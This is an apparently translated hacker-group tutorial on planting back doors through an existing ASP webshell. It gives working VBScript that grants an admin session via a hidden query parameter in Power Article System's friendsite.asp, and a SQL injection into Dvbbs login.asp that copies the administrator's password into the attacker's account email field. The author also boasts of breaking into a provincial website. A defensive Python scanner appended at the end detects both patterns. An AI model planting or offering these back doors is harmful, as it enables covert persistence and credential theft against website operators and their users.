Author: aweige (Chinese Hackers Red Army)
Since the upload-vulnerability disaster in the forums, and the upload vulnerabilities recently exposed in various ASP systems that have been around for two years, many friends probably hold a lot of webshells on zombie hosts. What people do with them varies: some keep escalating privileges and pushing the intrusion further; some just take a look and the trojan is forgotten; and for some, once the novelty of the webshell has worn off, only the mystery and temptation of the admin back end remains. Frankly, on many powerful systems I would rather have a good back door than anything else...... But the newer versions of many ASP systems now store passwords as MD5 hashes and pair that with a fairly strict verification routine. Can we still break through these limits? Yes! This article is about how. Let's get straight to it; there is good stuff here. Follow me......

Session spoofing

First, briefly, how a typical ASP system does authentication. The administrator enters an account and password on the login page, and the program looks that username and password up in the database. If such an account exists it treats you as an administrator and gives you a Session value that represents your identity. Alternatively, the program takes the username and password you submitted, pulls the administrator's account and password out of the admin table in the database, and compares the two; if they are equal it gives you the Session value that marks you as an administrator. From then on, whenever you open any management page, it first checks your Session value: if the Session says you are an administrator you are let through, otherwise you are redirected back to the login page or shown some odd warning, depending on the programmer's personal preferences.
Knowing the principle, our idea is this: use our ASP trojan to modify the program so that it hands us an administrator Session. Then we do not need the administrator's password at all, and nothing in the back end will ever block us. I call this method session spoofing. Space does not allow describing it for every system, so this article uses only the Power Article System as an example, version 3.51 (Figure 1).
Figure 1. Every version of the Power Article System falls to this, including Easy; everyone can practise on it themselves. Let's look at its verification logic. In Power Article 3.51 the verification page is admin_chklogin.asp, and the relevant part reads:

    ......
    Else
        rs("LastLoginIP") = Request.ServerVariables("REMOTE_ADDR")
        rs("LastLoginTime") = Now()
        rs("LoginTimes") = rs("LoginTimes") + 1
        rs.Update
        session.timeout = sessionTimeout
        session("adminName") = rs("username")
        rs.Close
        Set rs = Nothing
        Call closeconn()
        Response.Redirect "admin_index.asp"

Everything up to the Else is the username/password check. After the Else, look: once the username and password are correct, you are given two session values:

    session.timeout = sessionTimeout
    session("adminName") = rs("username")

Now how do the other management pages verify the session? At first sight it looks strict, but look again: all they check is the adminName session. So as long as our session carries an adminName, don't we pass? Let's start. First get its administrator account name; I won't teach you that, you can find it out on the website itself or by downloading its database. Next find a page to modify. I pick one almost nobody looks at, friendsite.asp (the friendly-links page), so the administrator is unlikely to notice. Use the ASP trojan's edit function and add a few lines to the page:

    Dim id
    id = Trim(Request("qwe"))
    If id = "120" Then
        Session("adminName") = "admin"   ' "admin" is assumed here; in practice use the real administrator account
    End If

In plain words: read the value of qwe from the address bar, and if qwe = 120 the system gives us a Session value of admin. Now open the page with that parameter and look, Figure 2:
See anything abnormal? No, it is still the normal page. But now type the back-end management home page into the address bar. There it is, isn't it? Figure 3:
Figure 3. Heh, don't go doing bad things with this......

Summary: get the administrator's account name, find the verification page, and write the back door we want according to what that page verifies. Different systems verify in different ways; the Qingchuang article system, for example, checks more than just your username. But our overall thinking stays the same: give it exactly what it checks.

The method above is powerless against the Dvbbs forum and other forums, because a forum is far more interactive than an article system and therefore does a lot more verification. Take Dvbbs: to log into the back end it first checks that you have already logged in at the front end, and if you haven't it sends you back to a blank page. After you log in at the front end, the system gives you a session that records your username and your ID; when you then log into the back end it takes those out and compares whether the front and back match, and only then do you pass. Otherwise you run into this strict verification. Is there a way through it? Yes. No. (Who threw that at me? What a waste.) But we can think of new ways. Since the verification is so strict, what if I simply take the password itself? So the new idea here is to get the plaintext password. When does a plaintext password exist? Yes, when the administrator logs in. So that is where we get our hands in: have the login page send us the password it was given, and then we log in with that password ourselves. Isn't that a lot like a sniffer? Just a few months ago, a few of the brothers and I, the Qi Dynasty, were out in the field with a hardware sniffer together with the provincial network security people, and took the provincial website: a full 4000G of hard disk, dozens of servers, in one word: cool. Let's start modifying its program.
Edit login.asp and add the following:

    If Not IsNull(Trim(Request("UserName"))) Then
        If Request("UserName") = "admin" Then   ' "admin" is assumed; in practice use the real administrator name
            sql = "Update [Dv_User] Set UserEmail = (Select UserPassword From [Dv_User] Where UserName='admin') Where UserName='yourname'"   ' 'yourname' is the account you registered on the forum
            conn.Execute sql   ' run the update
        End If
    End If

Once the administrator logs in successfully, the database is updated and his password is put into the e-mail field of our own account, so of course you must first register a username on the forum. The result is shown in Figure 4.

Figure 4. Also, this assumes the default database and admin table name, and for version 7.0 and above it is not usable as-is in actual operation.

Postscript: For the above two methods I still cannot think of any more effective countermeasure, because once your website has a trojan on it there is no way to stop people inserting code. If you have a good solution, remember to tell me. QQ: 289509785. Also, I hope nobody goes out to cause damage; at the time I really didn't want to see that. Good luck to all network administrators, and I hope you never meet a cracker.
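Both back doors above share two traits that a network manager can actually look for: a page other than the real login page assigning the admin session, and an UPDATE that copies the password column into a field the attacker can read back. The script below is an added example, not code from the article or from either product: it scans a set of ASP pages for those two patterns and diffs the web root against a hash baseline, which catches the friendsite.asp edit even if the pattern rules miss it. It assumes admin_chklogin.asp is the only page allowed to write the admin session and uses the Dv_User / UserPassword naming from the article's snippet; the sample pages are constructed for the demonstration.

```python
"""Added example: flag the two ASP back-door patterns from the article and
detect modified pages with a content-hash baseline. Not the article's code;
the sample web roots below are constructed and trimmed for the demo."""
import hashlib
import re

# Assumption: only the real login page may assign the admin session.
LOGIN_PAGES = {"admin_chklogin.asp"}

# session("anything") = ...   -> a Session write
SESSION_WRITE = re.compile(r'session\s*\(\s*"(?P<key>[^"]+)"\s*\)\s*=', re.I)
# UPDATE ... SET col = (SELECT ...password...)  -> copying a stored password
PASSWORD_COPY = re.compile(r'update\b.*\bset\b[^=]*=\s*\(\s*select\b[^)]*password', re.I)


def strip_comment(line: str) -> str:
    """Drop a trailing VBScript comment (') that sits outside a "..." string."""
    in_str = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_str = not in_str
        elif ch == "'" and not in_str:
            return line[:i]
    return line


def scan_page(name: str, source: str) -> list:
    """Return (page, line_no, rule, line) for each suspicious line in one page."""
    findings = []
    for no, raw in enumerate(source.splitlines(), 1):
        code = strip_comment(raw)
        if SESSION_WRITE.search(code) and name.lower() not in LOGIN_PAGES:
            findings.append((name, no, "session-write-outside-login", raw.strip()))
        if PASSWORD_COPY.search(code):
            findings.append((name, no, "password-copied-by-sql", raw.strip()))
    return findings


def scan_site(pages: dict) -> list:
    """Scan every page of a {filename: source} web root, in name order."""
    out = []
    for name, src in sorted(pages.items()):
        out.extend(scan_page(name, src))
    return out


def baseline(pages: dict) -> dict:
    """SHA-256 of each known-good page; keep this off the web server."""
    return {n: hashlib.sha256(s.encode()).hexdigest() for n, s in pages.items()}


def changed_pages(base: dict, pages: dict) -> list:
    """Pages added or modified since the baseline was taken."""
    return sorted(n for n, s in pages.items()
                  if base.get(n) != hashlib.sha256(s.encode()).hexdigest())


# Constructed sample web root: a trimmed admin_chklogin.asp, a clean
# friendsite.asp and a clean login.asp.
CLEAN_SITE = {
    "admin_chklogin.asp": ('session.timeout = sessionTimeout\n'
                           'session("adminName") = rs("username")\n'
                           'Response.Redirect "admin_index.asp"\n'),
    "friendsite.asp": '<%\nrs.Open "select * from friendsite", conn, 1, 1\n%>\n',
    "login.asp": '<%\nif request("username") = "" then response.end\n%>\n',
}

# The same root after the two back doors from the article were planted.
BACKDOORED_SITE = dict(CLEAN_SITE)
BACKDOORED_SITE["friendsite.asp"] = CLEAN_SITE["friendsite.asp"] + (
    'Dim id\n'
    'id = Trim(Request("qwe"))\n'
    'If id = "120" Then\n'
    '    Session("adminName") = "admin"  \' hidden login\n'
    'End If\n')
BACKDOORED_SITE["login.asp"] = CLEAN_SITE["login.asp"] + (
    'If Request("UserName") = "admin" Then\n'
    '    sql = "Update [Dv_User] Set UserEmail = (Select UserPassword From [Dv_User] '
    'Where UserName=\'admin\') Where UserName=\'ourname\'"\n'
    '    conn.Execute sql\n'
    'End If\n')

if __name__ == "__main__":
    for f in scan_site(BACKDOORED_SITE):
        print("%s:%d %s  %s" % f)
    print("changed:", changed_pages(baseline(CLEAN_SITE), BACKDOORED_SITE))
```

The pattern rules are heuristics and will need the login-page allow-list and table names adjusted per application; the hash baseline is the reliable part, since any edit made through a webshell changes the file regardless of how it is disguised.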